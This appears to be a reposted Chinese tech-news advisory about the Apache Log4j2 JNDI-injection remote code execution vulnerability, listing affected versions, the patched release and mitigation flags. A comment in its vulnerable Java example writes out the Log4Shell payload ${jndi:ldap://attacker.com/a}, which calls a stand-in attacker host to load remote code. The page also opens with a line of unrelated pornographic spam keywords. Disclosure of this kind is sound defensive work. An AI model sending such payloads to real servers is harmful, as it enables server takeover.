少妇逼,91av成人视频,一级AAA片,导航黄色一级片,亚洲日韩欧美三级片,九七精品视频在线观看,欧美成人免费在线观看视频,久久99精品国产.久久久久久

點(diǎn)擊關(guān)注公眾號，Java干貨及時送達(dá)

粉絲福利：小編會從今天留言的小伙伴中隨機(jī)抽贈送8.88元現(xiàn)金紅包。娛樂抽獎，大家隨緣積極參與啦，給生活一點(diǎn)小幸運(yùn)~感謝大家的支持

整理 | 葉子

出品 | OSC開源社區(qū)（ID：oschina2013）

昨晚，Apache Log4j2 的遠(yuǎn)程代碼執(zhí)行漏洞刷爆朋友圈，該漏洞一旦被攻擊者利用會造成嚴(yán)重危害。而且此次漏洞影響巨大，很多網(wǎng)站如百度等都是此次 Log4j 遠(yuǎn)程代碼執(zhí)行漏洞的受害者，很多互聯(lián)網(wǎng)企業(yè)也都連夜做了應(yīng)急措施。

漏洞詳情：

Apache Log4j 遠(yuǎn)程代碼執(zhí)行漏洞?

嚴(yán)重程度: 嚴(yán)重

由于Apache Log4j2某些功能存在遞歸解析功能，攻擊者可直接構(gòu)造惡意請求，觸發(fā)遠(yuǎn)程代碼執(zhí)行漏洞。漏洞利用無需特殊配置

漏洞情況分析：

Apache Log4j是一個基于Java的日志記錄組件。Apache Log4j2是Log4j的升級版本，通過重寫Log4j引入了豐富的功能特性。該日志組件被廣泛應(yīng)用于業(yè)務(wù)系統(tǒng)開發(fā)，用以記錄程序輸入輸出日志信息。

2021年11月24日，阿里云安全團(tuán)隊向Apache官方報告了Apache Log4j2遠(yuǎn)程代碼執(zhí)行漏洞。由于Log4j2組件在處理程序日志記錄時存在JNDI注入缺陷，未經(jīng)授權(quán)的攻擊者利用該漏洞，可向目標(biāo)服務(wù)器發(fā)送精心構(gòu)造的惡意數(shù)據(jù)，觸發(fā)Log4j2組件解析缺陷，實(shí)現(xiàn)目標(biāo)服務(wù)器的任意代碼執(zhí)行，獲得目標(biāo)服務(wù)器權(quán)限。

漏洞編號：暫缺

漏洞等級：

高危，該漏洞影響范圍極廣，危害極大。

CVSS評分：10（最高級）

漏洞狀態(tài)：

受影響的版本：

Apache log4j2 2.0 - 2.14.1 版本均受影響。

安全版本：

Apache log4j-2.15.0-rc2

易受攻擊代碼示例：

import org.apache.log4j.Logger;
import java.io.*;
import java.sql.SQLException;
import java.util.*;
public class VulnerableLog4jExampleHandler implements HttpHandler {
static Logger log = Logger.getLogger(log4jExample.class.getName());
/**
* A simple HTTP endpoint that reads the request's User Agent and logs it back.
* This is basically pseudo-code to explain the vulnerability, and not a full example.
* @param he HTTP Request Object
*/
public void handle(HttpExchange he) throws IOException {
string userAgent = he.getRequestHeader("user-agent");

// This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.
// The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
log.info("Request User Agent:" + userAgent);
String response = "
Hello There, " + userAgent + "!
";
he.sendResponseHeaders(200, response.length());
OutputStream os = he.getResponseBody();
os.write(response.getBytes());
os.close();
}
}

漏洞修復(fù)方案：

Apache官方已發(fā)布補(bǔ)丁，建議受影響的用戶盡快升級到安全版本。

補(bǔ)丁下載地址：

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

漏洞緩解措施：

（1）jvm參數(shù) -Dlog4j2.formatMsgNoLookups=true

（2）log4j2.formatMsgNoLookups=True

因該組件使用極為廣泛，利用門檻很低，危害極大，建議所有用戶盡快升級到安全版本。


往
期
推
薦
1、致歉！抖音Semi Design承認(rèn)參考阿里Ant Design
2、對比7種分布式事務(wù)方案，還是偏愛阿里開源的Seata，真香！
3、Redis存儲結(jié)構(gòu)體信息，選hash還是string？
4、掃盲 docker 常用命令
5、最全分布式Session解決方案
6、21 款 yyds 的 IDEA插件
7、真香！用 IDEA 神器看源碼，效率真高！
點(diǎn)分享
點(diǎn)收藏
點(diǎn)點(diǎn)贊
點(diǎn)在看

炸鍋了！Apache Log4j2 核彈級漏洞公開

易受攻擊代碼示例：

Hello There, " + userAgent + "!

往期推薦

往
期
推
薦